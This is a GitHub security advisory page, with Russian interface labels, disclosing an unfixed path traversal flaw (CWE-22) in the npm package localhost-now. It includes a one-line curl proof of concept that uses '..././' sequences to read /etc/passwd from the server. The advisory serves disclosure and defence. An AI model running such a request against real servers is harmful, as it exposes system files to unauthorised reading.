GHSA-73cw-jxmm-qpgh

Опубликовано: 11 июн. 2019

Источник: github

Github: Прошло ревью

Описание

Path Traversal in localhost-now

All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2

Proof of concept:

$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"

Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.

Ссылки

https://hackerone.com/reports/329837
https://github.com/DCKT/localhost-now/blob/master/lib/app.js#L17
https://www.npmjs.com/advisories/655

Пакеты

Наименование

localhost-now

npm

Затронутые версииВерсия исправления

<= 1.0.2

Отсутствует

Дефекты

CWE-22

Дефекты

CWE-22